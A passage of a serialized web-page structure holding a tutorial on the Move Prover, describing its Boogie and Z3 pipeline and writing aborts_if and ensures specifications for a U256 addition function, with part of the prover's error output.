inputs.",{"type":25,"tag":26,"props":13260,"children":13262},{"id":13261},"move-prover",[13263],{"type":31,"value":13264},"Move Prover",{"type":25,"tag":38,"props":13266,"children":13267},{},[13268],{"type":31,"value":13269},"The Move Prover is an automated tool that allows developers to formally verify smart contracts written in the Move programming language.",{"type":25,"tag":38,"props":13271,"children":13272},{},[13273],{"type":31,"value":13274},"Move was primarily designed to facilitate automatic verification. Interestingly, the Move Prove operates on the Move bytecode itself, avoiding potential compiler bugs from interfering with prover correctness.",{"type":25,"tag":38,"props":13276,"children":13277},{},[13278],{"type":31,"value":13279},"The architecture of the tool consists of multiple components as illustrated below.",{"type":25,"tag":38,"props":13281,"children":13282},{},[13283],{"type":25,"tag":6467,"props":13284,"children":13288},{"alt":13285,"src":13286,"title":13287},"Move Prover arch","https://i.imgur.com/ti4vkTu.png","Move Prover Architecture",[],{"type":25,"tag":38,"props":13290,"children":13291},{},[13292],{"type":31,"value":13293},"First, the Move prover receives a Move source file (an input) that contains specifications of the intended behavior of the program. Those specifications are then extracted from the annotated source by the Move Parser. Consequently, the tool compiles the source code into Move bytecode which is verified and converted into a prover object model plus the specification system \"blueprint\".",{"type":25,"tag":38,"props":13295,"children":13296},{},[13297,13299,13306],{"type":31,"value":13298},"The model is translated into an intermediate language, called ",{"type":25,"tag":162,"props":13300,"children":13303},{"href":13301,"rel":13302},"https://www.microsoft.com/en-us/research/project/boogie-an-intermediate-verification-language/",[166],[13304],{"type":31,"value":13305},"Boogie",{"type":31,"value":13307},". This Boogie code is then passed to the Boogie verification system which generates the input for the solver using a \"verification condition generation\". The verification condition (VC) is passed to an automated theorem prover (Z3).",{"type":25,"tag":38,"props":13309,"children":13310},{},[13311],{"type":31,"value":13312},"Once the VC is passed to the Z3, the prover checks if the SMT formula is unsatisfiable. If so, it means that the specifications hold. Otherwise, a model that satisfies the conditions is generated and converted back into Boogie format in order to issue a diagnosis report. The diagnosis report is then reverted to a source-level error which parallels a standard compiler error.",{"type":25,"tag":26,"props":13314,"children":13316},{"id":13315},"move-specification-language",[13317],{"type":31,"value":13318},"Move Specification Language",{"type":25,"tag":38,"props":13320,"children":13321},{},[13322],{"type":31,"value":13323},"Move MSL is a subset of the Move Language, which introduces support to statically describe the behavior about the correctness of a program with no implications on production.",{"type":25,"tag":38,"props":13325,"children":13326},{},[13327,13329,13336],{"type":31,"value":13328},"To better understand how to use the MSL, we will use ",{"type":25,"tag":162,"props":13330,"children":13333},{"href":13331,"rel":13332},"https://github.com/pontem-network/u256",[166],[13334],{"type":31,"value":13335},"Pontem's U256 library",{"type":31,"value":13337},", an open source Move library which implements support for U256 numbers, as a case study.",{"type":25,"tag":38,"props":13339,"children":13340},{},[13341],{"type":31,"value":13342},"The U256 number is implemented as a struct which contains 4 u64 numbers.",{"type":25,"tag":206,"props":13344,"children":13346},{"code":13345,"language":6914,"meta":7,"className":6915,"style":7},"struct U256 has copy, drop, store {\n    v0: u64,\n    v1: u64,\n    v2: u64,\n    v3: u64,\n}\n",[13347],{"type":25,"tag":82,"props":13348,"children":13349},{"__ignoreMap":7},[13350,13393,13413,13433,13453,13473],{"type":25,"tag":216,"props":13351,"children":13352},{"class":6922,"line":6923},[13353,13358,13362,13367,13372,13376,13381,13385,13389],{"type":25,"tag":216,"props":13354,"children":13355},{"style":6936},[13356],{"type":31,"value":13357},"struct",{"type":25,"tag":216,"props":13359,"children":13360},{"style":7375},[13361],{"type":31,"value":8678},{"type":25,"tag":216,"props":13363,"children":13364},{"style":6947},[13365],{"type":31,"value":13366}," has",{"type":25,"tag":216,"props":13368,"children":13369},{"style":6947},[13370],{"type":31,"value":13371}," copy",{"type":25,"tag":216,"props":13373,"children":13374},{"style":6964},[13375],{"type":31,"value":7026},{"type":25,"tag":216,"props":13377,"children":13378},{"style":6947},[13379],{"type":31,"value":13380},"drop",{"type":25,"tag":216,"props":13382,"children":13383},{"style":6964},[13384],{"type":31,"value":7026},{"type":25,"tag":216,"props":13386,"children":13387},{"style":6947},[13388],{"type":31,"value":9892},{"type":25,"tag":216,"props":13390,"children":13391},{"style":6964},[13392],{"type":31,"value":7241},{"type":25,"tag":216,"props":13394,"children":13395},{"class":6922,"line":6769},[13396,13401,13405,13409],{"type":25,"tag":216,"props":13397,"children":13398},{"style":6947},[13399],{"type":31,"value":13400},"    v0",{"type":25,"tag":216,"props":13402,"children":13403},{"style":6953},[13404],{"type":31,"value":1472},{"type":25,"tag":216,"props":13406,"children":13407},{"style":7375},[13408],{"type":31,"value":9811},{"type":25,"tag":216,"props":13410,"children":13411},{"style":6964},[13412],{"type":31,"value":7465},{"type":25,"tag":216,"props":13414,"children":13415},{"class":6922,"line":6778},[13416,13421,13425,13429],{"type":25,"tag":216,"props":13417,"children":13418},{"style":6947},[13419],{"type":31,"value":13420},"    v1",{"type":25,"tag":216,"props":13422,"children":13423},{"style":6953},[13424],{"type":31,"value":1472},{"type":25,"tag":216,"props":13426,"children":13427},{"style":7375},[13428],{"type":31,"value":9811},{"type":25,"tag":216,"props":13430,"children":13431},{"style":6964},[13432],{"type":31,"value":7465},{"type":25,"tag":216,"props":13434,"children":13435},{"class":6922,"line":7005},[13436,13441,13445,13449],{"type":25,"tag":216,"props":13437,"children":13438},{"style":6947},[13439],{"type":31,"value":13440},"    v2",{"type":25,"tag":216,"props":13442,"children":13443},{"style":6953},[13444],{"type":31,"value":1472},{"type":25,"tag":216,"props":13446,"children":13447},{"style":7375},[13448],{"type":31,"value":9811},{"type":25,"tag":216,"props":13450,"children":13451},{"style":6964},[13452],{"type":31,"value":7465},{"type":25,"tag":216,"props":13454,"children":13455},{"class":6922,"line":7110},[13456,13461,13465,13469],{"type":25,"tag":216,"props":13457,"children":13458},{"style":6947},[13459],{"type":31,"value":13460},"    v3",{"type":25,"tag":216,"props":13462,"children":13463},{"style":6953},[13464],{"type":31,"value":1472},{"type":25,"tag":216,"props":13466,"children":13467},{"style":7375},[13468],{"type":31,"value":9811},{"type":25,"tag":216,"props":13470,"children":13471},{"style":6964},[13472],{"type":31,"value":7465},{"type":25,"tag":216,"props":13474,"children":13475},{"class":6922,"line":7216},[13476],{"type":25,"tag":216,"props":13477,"children":13478},{"style":6964},[13479],{"type":31,"value":7874},{"type":25,"tag":38,"props":13481,"children":13482},{},[13483,13485,13491],{"type":31,"value":13484},"Now, let's consider the ",{"type":25,"tag":82,"props":13486,"children":13488},{"className":13487},[],[13489],{"type":31,"value":13490},"add(a: U256, b: U256): U256",{"type":31,"value":13492}," function. In order to verify the correctness of such a function, it might be useful to verify some of the group axioms, for example: commutativity and associativity.",{"type":25,"tag":38,"props":13494,"children":13495},{},[13496],{"type":31,"value":13497},"Specifications are declared in a specification block, which can be found in Move functions, as module member, or in a different file as a separate specification module.",{"type":25,"tag":38,"props":13499,"children":13500},{},[13501,13503,13509,13511,13518],{"type":31,"value":13502},"For example, if your file is ",{"type":25,"tag":82,"props":13504,"children":13506},{"className":13505},[],[13507],{"type":31,"value":13508},"sources/u256.move",{"type":31,"value":13510},", you can put specifications in ",{"type":25,"tag":162,"props":13512,"children":13515},{"href":13513,"rel":13514},"https://github.com/pontem-network/u256/blob/main/sources/u256.spec.move",[166],[13516],{"type":31,"value":13517},"sources/u256.spec.move",{"type":31,"value":179},{"type":25,"tag":206,"props":13520,"children":13522},{"code":13521,"language":6914,"meta":7,"className":6915,"style":7},"spec add { ... }\n",[13523],{"type":25,"tag":82,"props":13524,"children":13525},{"__ignoreMap":7},[13526],{"type":25,"tag":216,"props":13527,"children":13528},{"class":6922,"line":6923},[13529,13533,13538,13543,13548],{"type":25,"tag":216,"props":13530,"children":13531},{"style":6947},[13532],{"type":31,"value":12227},{"type":25,"tag":216,"props":13534,"children":13535},{"style":6947},[13536],{"type":31,"value":13537}," add",{"type":25,"tag":216,"props":13539,"children":13540},{"style":6964},[13541],{"type":31,"value":13542}," { ",{"type":25,"tag":216,"props":13544,"children":13545},{"style":6953},[13546],{"type":31,"value":13547},"...",{"type":25,"tag":216,"props":13549,"children":13550},{"style":6964},[13551],{"type":31,"value":13552}," }\n",{"type":25,"tag":38,"props":13554,"children":13555},{},[13556,13558,13563],{"type":31,"value":13557},"The specifications placed inside the specification blocks are considered ",{"type":25,"tag":64,"props":13559,"children":13560},{},[13561],{"type":31,"value":13562},"Expressions",{"type":31,"value":179},{"type":25,"tag":606,"props":13565,"children":13567},{"id":13566},"expressions",[13568],{"type":31,"value":13562},{"type":25,"tag":38,"props":13570,"children":13571},{},[13572],{"type":31,"value":13573},"Let's go over some common expressions.",{"type":25,"tag":38,"props":13575,"children":13576},{},[13577,13582],{"type":25,"tag":82,"props":13578,"children":13580},{"className":13579},[],[13581],{"type":31,"value":12277},{"type":31,"value":13583}," defines when the function can abort. This is especially useful in the context of smart contract development, where an abort would cause the entire transaction to rollback.",{"type":25,"tag":38,"props":13585,"children":13586},{},[13587,13589,13595],{"type":31,"value":13588},"For example, the ",{"type":25,"tag":82,"props":13590,"children":13592},{"className":13591},[],[13593],{"type":31,"value":13594},"add",{"type":31,"value":13596}," function aborts if and only if the U256 addition overflows. Let's put these words into an expression:",{"type":25,"tag":206,"props":13598,"children":13600},{"code":13599,"language":6914,"meta":7,"className":6915,"style":7},"const P64: u128 = 0x10000000000000000;\n\nspec fun value_of_U256(a: U256): num {\n    a.v0 +\n    a.v1 * P64 +\n    a.v2 * P64 * P64 +\n    a.v3 * P64 * P64 * P64\n}\n\nspec add {\n    aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n}\n",[13601],{"type":25,"tag":82,"props":13602,"children":13603},{"__ignoreMap":7},[13604,13638,13645,13694,13716,13745,13782,13823,13830,13837,13852,13933],{"type":25,"tag":216,"props":13605,"children":13606},{"class":6922,"line":6923},[13607,13612,13617,13621,13625,13629,13634],{"type":25,"tag":216,"props":13608,"children":13609},{"style":6936},[13610],{"type":31,"value":13611},"const",{"type":25,"tag":216,"props":13613,"children":13614},{"style":6964},[13615],{"type":31,"value":13616}," P64",{"type":25,"tag":216,"props":13618,"children":13619},{"style":6953},[13620],{"type":31,"value":1472},{"type":25,"tag":216,"props":13622,"children":13623},{"style":7375},[13624],{"type":31,"value":12800},{"type":25,"tag":216,"props":13626,"children":13627},{"style":6953},[13628],{"type":31,"value":6956},{"type":25,"tag":216,"props":13630,"children":13631},{"style":6989},[13632],{"type":31,"value":13633}," 0x10000000000000000",{"type":25,"tag":216,"props":13635,"children":13636},{"style":6964},[13637],{"type":31,"value":6967},{"type":25,"tag":216,"props":13639,"children":13640},{"class":6922,"line":6769},[13641],{"type":25,"tag":216,"props":13642,"children":13643},{"emptyLinePlaceholder":16},[13644],{"type":31,"value":7642},{"type":25,"tag":216,"props":13646,"children":13647},{"class":6922,"line":6778},[13648,13652,13656,13661,13665,13669,13673,13677,13681,13685,13690],{"type":25,"tag":216,"props":13649,"children":13650},{"style":6947},[13651],{"type":31,"value":12227},{"type":25,"tag":216,"props":13653,"children":13654},{"style":6947},[13655],{"type":31,"value":10158},{"type":25,"tag":216,"props":13657,"children":13658},{"style":7047},[13659],{"type":31,"value":13660}," value_of_U256",{"type":25,"tag":216,"props":13662,"children":13663},{"style":6964},[13664],{"type":31,"value":1850},{"type":25,"tag":216,"props":13666,"children":13667},{"style":6947},[13668],{"type":31,"value":162},{"type":25,"tag":216,"props":13670,"children":13671},{"style":6953},[13672],{"type":31,"value":1472},{"type":25,"tag":216,"props":13674,"children":13675},{"style":7375},[13676],{"type":31,"value":8678},{"type":25,"tag":216,"props":13678,"children":13679},{"style":6964},[13680],{"type":31,"value":1888},{"type":25,"tag":216,"props":13682,"children":13683},{"style":6953},[13684],{"type":31,"value":1472},{"type":25,"tag":216,"props":13686,"children":13687},{"style":6947},[13688],{"type":31,"value":13689}," num",{"type":25,"tag":216,"props":13691,"children":13692},{"style":6964},[13693],{"type":31,"value":7241},{"type":25,"tag":216,"props":13695,"children":13696},{"class":6922,"line":7005},[13697,13702,13706,13711],{"type":25,"tag":216,"props":13698,"children":13699},{"style":6947},[13700],{"type":31,"value":13701},"    a",{"type":25,"tag":216,"props":13703,"children":13704},{"style":6953},[13705],{"type":31,"value":179},{"type":25,"tag":216,"props":13707,"children":13708},{"style":6964},[13709],{"type":31,"value":13710},"v0 ",{"type":25,"tag":216,"props":13712,"children":13713},{"style":6953},[13714],{"type":31,"value":13715},"+\n",{"type":25,"tag":216,"props":13717,"children":13718},{"class":6922,"line":7110},[13719,13723,13727,13732,13736,13740],{"type":25,"tag":216,"props":13720,"children":13721},{"style":6947},[13722],{"type":31,"value":13701},{"type":25,"tag":216,"props":13724,"children":13725},{"style":6953},[13726],{"type":31,"value":179},{"type":25,"tag":216,"props":13728,"children":13729},{"style":6964},[13730],{"type":31,"value":13731},"v1 ",{"type":25,"tag":216,"props":13733,"children":13734},{"style":6953},[13735],{"type":31,"value":8519},{"type":25,"tag":216,"props":13737,"children":13738},{"style":7375},[13739],{"type":31,"value":13616},{"type":25,"tag":216,"props":13741,"children":13742},{"style":6953},[13743],{"type":31,"value":13744}," +\n",{"type":25,"tag":216,"props":13746,"children":13747},{"class":6922,"line":7216},[13748,13752,13756,13761,13765,13769,13774,13778],{"type":25,"tag":216,"props":13749,"children":13750},{"style":6947},[13751],{"type":31,"value":13701},{"type":25,"tag":216,"props":13753,"children":13754},{"style":6953},[13755],{"type":31,"value":179},{"type":25,"tag":216,"props":13757,"children":13758},{"style":6964},[13759],{"type":31,"value":13760},"v2 ",{"type":25,"tag":216,"props":13762,"children":13763},{"style":6953},[13764],{"type":31,"value":8519},{"type":25,"tag":216,"props":13766,"children":13767},{"style":7375},[13768],{"type":31,"value":13616},{"type":25,"tag":216,"props":13770,"children":13771},{"style":6953},[13772],{"type":31,"value":13773}," *",{"type":25,"tag":216,"props":13775,"children":13776},{"style":7375},[13777],{"type":31,"value":13616},{"type":25,"tag":216,"props":13779,"children":13780},{"style":6953},[13781],{"type":31,"value":13744},{"type":25,"tag":216,"props":13783,"children":13784},{"class":6922,"line":7244},[13785,13789,13793,13798,13802,13806,13810,13814,13818],{"type":25,"tag":216,"props":13786,"children":13787},{"style":6947},[13788],{"type":31,"value":13701},{"type":25,"tag":216,"props":13790,"children":13791},{"style":6953},[13792],{"type":31,"value":179},{"type":25,"tag":216,"props":13794,"children":13795},{"style":6964},[13796],{"type":31,"value":13797},"v3 ",{"type":25,"tag":216,"props":13799,"children":13800},{"style":6953},[13801],{"type":31,"value":8519},{"type":25,"tag":216,"props":13803,"children":13804},{"style":7375},[13805],{"type":31,"value":13616},{"type":25,"tag":216,"props":13807,"children":13808},{"style":6953},[13809],{"type":31,"value":13773},{"type":25,"tag":216,"props":13811,"children":13812},{"style":7375},[13813],{"type":31,"value":13616},{"type":25,"tag":216,"props":13815,"children":13816},{"style":6953},[13817],{"type":31,"value":13773},{"type":25,"tag":216,"props":13819,"children":13820},{"style":7375},[13821],{"type":31,"value":13822}," P64\n",{"type":25,"tag":216,"props":13824,"children":13825},{"class":6922,"line":7257},[13826],{"type":25,"tag":216,"props":13827,"children":13828},{"style":6964},[13829],{"type":31,"value":7874},{"type":25,"tag":216,"props":13831,"children":13832},{"class":6922,"line":7275},[13833],{"type":25,"tag":216,"props":13834,"children":13835},{"emptyLinePlaceholder":16},[13836],{"type":31,"value":7642},{"type":25,"tag":216,"props":13838,"children":13839},{"class":6922,"line":7296},[13840,13844,13848],{"type":25,"tag":216,"props":13841,"children":13842},{"style":6947},[13843],{"type":31,"value":12227},{"type":25,"tag":216,"props":13845,"children":13846},{"style":6947},[13847],{"type":31,"value":13537},{"type":25,"tag":216,"props":13849,"children":13850},{"style":6964},[13851],{"type":31,"value":7241},{"type":25,"tag":216,"props":13853,"children":13854},{"class":6922,"line":7305},[13855,13860,13864,13868,13872,13876,13880,13884,13888,13892,13896,13901,13905,13909,13913,13917,13921,13925,13929],{"type":25,"tag":216,"props":13856,"children":13857},{"style":6947},[13858],{"type":31,"value":13859},"    aborts_if",{"type":25,"tag":216,"props":13861,"children":13862},{"style":7047},[13863],{"type":31,"value":13660},{"type":25,"tag":216,"props":13865,"children":13866},{"style":6964},[13867],{"type":31,"value":1850},{"type":25,"tag":216,"props":13869,"children":13870},{"style":6947},[13871],{"type":31,"value":162},{"type":25,"tag":216,"props":13873,"children":13874},{"style":6964},[13875],{"type":31,"value":7036},{"type":25,"tag":216,"props":13877,"children":13878},{"style":6953},[13879],{"type":31,"value":3539},{"type":25,"tag":216,"props":13881,"children":13882},{"style":7047},[13883],{"type":31,"value":13660},{"type":25,"tag":216,"props":13885,"children":13886},{"style":6964},[13887],{"type":31,"value":1850},{"type":25,"tag":216,"props":13889,"children":13890},{"style":6947},[13891],{"type":31,"value":7171},{"type":25,"tag":216,"props":13893,"children":13894},{"style":6964},[13895],{"type":31,"value":7036},{"type":25,"tag":216,"props":13897,"children":13898},{"style":6953},[13899],{"type":31,"value":13900},">=",{"type":25,"tag":216,"props":13902,"children":13903},{"style":7375},[13904],{"type":31,"value":13616},{"type":25,"tag":216,"props":13906,"children":13907},{"style":6953},[13908],{"type":31,"value":13773},{"type":25,"tag":216,"props":13910,"children":13911},{"style":7375},[13912],{"type":31,"value":13616},{"type":25,"tag":216,"props":13914,"children":13915},{"style":6953},[13916],{"type":31,"value":13773},{"type":25,"tag":216,"props":13918,"children":13919},{"style":7375},[13920],{"type":31,"value":13616},{"type":25,"tag":216,"props":13922,"children":13923},{"style":6953},[13924],{"type":31,"value":13773},{"type":25,"tag":216,"props":13926,"children":13927},{"style":7375},[13928],{"type":31,"value":13616},{"type":25,"tag":216,"props":13930,"children":13931},{"style":6964},[13932],{"type":31,"value":6967},{"type":25,"tag":216,"props":13934,"children":13935},{"class":6922,"line":7557},[13936],{"type":25,"tag":216,"props":13937,"children":13938},{"style":6964},[13939],{"type":31,"value":7874},{"type":25,"tag":38,"props":13941,"children":13942},{},[13943,13945,13952],{"type":31,"value":13944},"We can observe in the snippet above, that we are allowed to call functions inside the spec block. However, the callee must either be an ",{"type":25,"tag":162,"props":13946,"children":13949},{"href":13947,"rel":13948},"https://github.com/move-language/move/blob/f7d5b1a3f4d622c17f540190fa4fa12323cb0bb8/language/move-prover/doc/user/spec-lang.md#builtin-functions",[166],[13950],{"type":31,"value":13951},"MSL function",{"type":31,"value":13953},", or a pure Move function. A pure Move function can be defined as a function that does not modify the global state or use Move expression features unsupported by MSL.",{"type":25,"tag":38,"props":13955,"children":13956},{},[13957,13959,13964,13965,13970],{"type":31,"value":13958},"A common pattern for ",{"type":25,"tag":82,"props":13960,"children":13962},{"className":13961},[],[13963],{"type":31,"value":12277},{"type":31,"value":1680},{"type":25,"tag":82,"props":13966,"children":13968},{"className":13967},[],[13969],{"type":31,"value":12285},{"type":31,"value":13971},", which lets you prove that a function will never abort.",{"type":25,"tag":206,"props":13973,"children":13975},{"code":13974,"language":6914,"meta":7,"className":6915,"style":7},"spec critical_function {\n    aborts_if false;\n}\n",[13976],{"type":25,"tag":82,"props":13977,"children":13978},{"__ignoreMap":7},[13979,13995,14010],{"type":25,"tag":216,"props":13980,"children":13981},{"class":6922,"line":6923},[13982,13986,13991],{"type":25,"tag":216,"props":13983,"children":13984},{"style":6947},[13985],{"type":31,"value":12227},{"type":25,"tag":216,"props":13987,"children":13988},{"style":6947},[13989],{"type":31,"value":13990}," critical_function",{"type":25,"tag":216,"props":13992,"children":13993},{"style":6964},[13994],{"type":31,"value":7241},{"type":25,"tag":216,"props":13996,"children":13997},{"class":6922,"line":6769},[13998,14002,14006],{"type":25,"tag":216,"props":13999,"children":14000},{"style":6947},[14001],{"type":31,"value":13859},{"type":25,"tag":216,"props":14003,"children":14004},{"style":6936},[14005],{"type":31,"value":13012},{"type":25,"tag":216,"props":14007,"children":14008},{"style":6964},[14009],{"type":31,"value":6967},{"type":25,"tag":216,"props":14011,"children":14012},{"class":6922,"line":6778},[14013],{"type":25,"tag":216,"props":14014,"children":14015},{"style":6964},[14016],{"type":31,"value":7874},{"type":25,"tag":38,"props":14018,"children":14019},{},[14020,14022,14028],{"type":31,"value":14021},"Another type of expression that we can use is ",{"type":25,"tag":82,"props":14023,"children":14025},{"className":14024},[],[14026],{"type":31,"value":14027},"ensures",{"type":31,"value":14029},". As the name suggests, it ensures that a certain condition is true at the end of a function's execution.",{"type":25,"tag":38,"props":14031,"children":14032},{},[14033,14035,14040,14042,14047],{"type":31,"value":14034},"In the case of the ",{"type":25,"tag":82,"props":14036,"children":14038},{"className":14037},[],[14039],{"type":31,"value":13594},{"type":31,"value":14041}," function, we want to ensure that the return value is the sum of the 2 parameters. Note that because ",{"type":25,"tag":9273,"props":14043,"children":14044},{},[14045],{"type":31,"value":14046},"MSL uses unbounded numbers",{"type":31,"value":14048},", we're able to very cleanly express this property without worrying about overflows.",{"type":25,"tag":206,"props":14050,"children":14052},{"code":14051,"language":6914,"meta":7,"className":6915,"style":7},"spec add {\n    aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n    ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n}\n",[14053],{"type":25,"tag":82,"props":14054,"children":14055},{"__ignoreMap":7},[14056,14071,14150,14214],{"type":25,"tag":216,"props":14057,"children":14058},{"class":6922,"line":6923},[14059,14063,14067],{"type":25,"tag":216,"props":14060,"children":14061},{"style":6947},[14062],{"type":31,"value":12227},{"type":25,"tag":216,"props":14064,"children":14065},{"style":6947},[14066],{"type":31,"value":13537},{"type":25,"tag":216,"props":14068,"children":14069},{"style":6964},[14070],{"type":31,"value":7241},{"type":25,"tag":216,"props":14072,"children":14073},{"class":6922,"line":6769},[14074,14078,14082,14086,14090,14094,14098,14102,14106,14110,14114,14118,14122,14126,14130,14134,14138,14142,14146],{"type":25,"tag":216,"props":14075,"children":14076},{"style":6947},[14077],{"type":31,"value":13859},{"type":25,"tag":216,"props":14079,"children":14080},{"style":7047},[14081],{"type":31,"value":13660},{"type":25,"tag":216,"props":14083,"children":14084},{"style":6964},[14085],{"type":31,"value":1850},{"type":25,"tag":216,"props":14087,"children":14088},{"style":6947},[14089],{"type":31,"value":162},{"type":25,"tag":216,"props":14091,"children":14092},{"style":6964},[14093],{"type":31,"value":7036},{"type":25,"tag":216,"props":14095,"children":14096},{"style":6953},[14097],{"type":31,"value":3539},{"type":25,"tag":216,"props":14099,"children":14100},{"style":7047},[14101],{"type":31,"value":13660},{"type":25,"tag":216,"props":14103,"children":14104},{"style":6964},[14105],{"type":31,"value":1850},{"type":25,"tag":216,"props":14107,"children":14108},{"style":6947},[14109],{"type":31,"value":7171},{"type":25,"tag":216,"props":14111,"children":14112},{"style":6964},[14113],{"type":31,"value":7036},{"type":25,"tag":216,"props":14115,"children":14116},{"style":6953},[14117],{"type":31,"value":13900},{"type":25,"tag":216,"props":14119,"children":14120},{"style":7375},[14121],{"type":31,"value":13616},{"type":25,"tag":216,"props":14123,"children":14124},{"style":6953},[14125],{"type":31,"value":13773},{"type":25,"tag":216,"props":14127,"children":14128},{"style":7375},[14129],{"type":31,"value":13616},{"type":25,"tag":216,"props":14131,"children":14132},{"style":6953},[14133],{"type":31,"value":13773},{"type":25,"tag":216,"props":14135,"children":14136},{"style":7375},[14137],{"type":31,"value":13616},{"type":25,"tag":216,"props":14139,"children":14140},{"style":6953},[14141],{"type":31,"value":13773},{"type":25,"tag":216,"props":14143,"children":14144},{"style":7375},[14145],{"type":31,"value":13616},{"type":25,"tag":216,"props":14147,"children":14148},{"style":6964},[14149],{"type":31,"value":6967},{"type":25,"tag":216,"props":14151,"children":14152},{"class":6922,"line":6778},[14153,14158,14162,14166,14170,14174,14178,14182,14186,14190,14194,14198,14202,14206,14210],{"type":25,"tag":216,"props":14154,"children":14155},{"style":6947},[14156],{"type":31,"value":14157},"    ensures",{"type":25,"tag":216,"props":14159,"children":14160},{"style":7047},[14161],{"type":31,"value":13660},{"type":25,"tag":216,"props":14163,"children":14164},{"style":6964},[14165],{"type":31,"value":1850},{"type":25,"tag":216,"props":14167,"children":14168},{"style":6947},[14169],{"type":31,"value":13037},{"type":25,"tag":216,"props":14171,"children":14172},{"style":6964},[14173],{"type":31,"value":7036},{"type":25,"tag":216,"props":14175,"children":14176},{"style":6953},[14177],{"type":31,"value":12528},{"type":25,"tag":216,"props":14179,"children":14180},{"style":7047},[14181],{"type":31,"value":13660},{"type":25,"tag":216,"props":14183,"children":14184},{"style":6964},[14185],{"type":31,"value":1850},{"type":25,"tag":216,"props":14187,"children":14188},{"style":6947},[14189],{"type":31,"value":162},{"type":25,"tag":216,"props":14191,"children":14192},{"style":6964},[14193],{"type":31,"value":7036},{"type":25,"tag":216,"props":14195,"children":14196},{"style":6953},[14197],{"type":31,"value":3539},{"type":25,"tag":216,"props":14199,"children":14200},{"style":7047},[14201],{"type":31,"value":13660},{"type":25,"tag":216,"props":14203,"children":14204},{"style":6964},[14205],{"type":31,"value":1850},{"type":25,"tag":216,"props":14207,"children":14208},{"style":6947},[14209],{"type":31,"value":7171},{"type":25,"tag":216,"props":14211,"children":14212},{"style":6964},[14213],{"type":31,"value":7797},{"type":25,"tag":216,"props":14215,"children":14216},{"class":6922,"line":7005},[14217],{"type":25,"tag":216,"props":14218,"children":14219},{"style":6964},[14220],{"type":31,"value":7874},{"type":25,"tag":38,"props":14222,"children":14223},{},[14224],{"type":31,"value":14225},"Note that because Move specification functions are written in MSL, the numbers are unbounded and we can define the expression without risk of overflow.",{"type":25,"tag":38,"props":14227,"children":14228},{},[14229],{"type":31,"value":14230},"Let's try to prove the library with the specifications from above:",{"type":25,"tag":206,"props":14232,"children":14234},{"code":14233,"language":8190,"meta":7,"className":8191,"style":7},"$ move prove\n",[14235],{"type":25,"tag":82,"props":14236,"children":14237},{"__ignoreMap":7},[14238],{"type":25,"tag":216,"props":14239,"children":14240},{"class":6922,"line":6923},[14241,14246,14251],{"type":25,"tag":216,"props":14242,"children":14243},{"style":7047},[14244],{"type":31,"value":14245},"$",{"type":25,"tag":216,"props":14247,"children":14248},{"style":8205},[14249],{"type":31,"value":14250}," move",{"type":25,"tag":216,"props":14252,"children":14253},{"style":8205},[14254],{"type":31,"value":14255}," prove\n",{"type":25,"tag":38,"props":14257,"children":14258},{},[14259],{"type":31,"value":14260},"It outputs the following error information:",{"type":25,"tag":206,"props":14262,"children":14264},{"code":14263,"language":8190,"meta":7,"className":8191,"style":7},"[...]\n\nerror: abort not covered by any of the `aborts_if` clauses\n╭     spec add {\n|         aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n|         ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n|     }\n╰─────^\n\n[...]\n\n at ./sources/u256.move:316: add\n enter loop, variable(s) carry, i, ret havocked and reassigned\n     carry = 54\n     i = 3792\n     ret = u256.U256{v0 = 26418, v1 = 27938, v2 = 6900, v3 = 1999}\n at ./sources/u256.move:346: add\n     ABORTED\n\nFAILURE proving 1 modules from package `u256` in 9.143s\n{\n    \"Error\": \"Move Prover failed: exiting with verification errors\"\n}\n",[14265],{"type":25,"tag":82,"props":14266,"children":14267},{"__ignoreMap":7},[14268,14276,14283,14345,14366,14455,14523,14535,14543,14550,14557,14564,14582,14642,14659,14676,14748,14764,14772,14779,14829,14837,14854],{"type":25,"tag":216,"props":14269,"children":14270},{"class":6922,"line":6923},[14271],{"type":25,"tag":216,"props":14272,"children":14273},{"style":6964},[14274],{"type":31,"value":14275},"[...]\n",{"type":25,"tag":216,"props":14277,"children":14278},{"class":6922,"line":6769},[14279],{"type":25,"tag":216,"props":14280,"children":14281},{"emptyLinePlaceholder":16},[14282],{"type":31,"value":7642},{"type":25,"tag":216,"props":14284,"children":14285},{"class":6922,"line":6778},[14286,14291,14296,14301,14306,14311,14316,14321,14326,14331,14335,14340],{"type":25,"tag":216,"props":14287,"children":14288},{"style":7047},[14289],{"type":31,"value":14290},"error:",{"type":25,"tag":216,"props":14292,"children":14293},{"style":8205},[14294],{"type":31,"value":14295}," abort",{"type":25,"tag":216,"props":14297,"children":14298},{"style":8205},[14299],{"type":31,"value":14300}," not",{"type":25,"tag":216,"props":14302,"children":14303},{"style":8205},[14304],{"type":31,"value":14305}," covered",{"type":25,"tag":216,"props":14307,"children":14308},{"style":8205},[14309],{"type":31,"value":14310}," by",{"type":25,"tag":216,"props":14312,"children":14313},{"style":8205},[14314],{"type":31,"value":14315}," any",{"type":25,"tag":216,"props":14317,"children":14318},{"style":8205},[14319],{"type":31,"value":14320}," of",{"type":25,"tag":216,"props":14322,"children":14323},{"style":8205},[14324],{"type":31,"value":14325}," the",{"type":25,"tag":216,"props":14327,"children":14328},{"style":8205},[14329],{"type":31,"value":14330}," `",{"type":25,"tag":216,"props":14332,"children":14333},{"style":7047},[14334],{"type":31,"value":12277},{"type":25,"tag":216,"props":14336,"children":14337},{"style":8205},[14338],{"type":31,"value":14339},"`",{"type":25,"tag":216,"props":14341,"children":14342},{"style":7047},[14343],{"type":31,"value":14344}," clauses\n",{"type":25,"tag":216,"props":14346,"children":14347},{"class":6922,"line":7005},[14348,14353,14358,14362],{"type":25,"tag":216,"props":14349,"children":14350},{"style":7047},[14351],{"type":31,"value":14352},"╭",{"type":25,"tag":216,"props":14354,"children":14355},{"style":8205},[14356],{"type":31,"value":14357},"     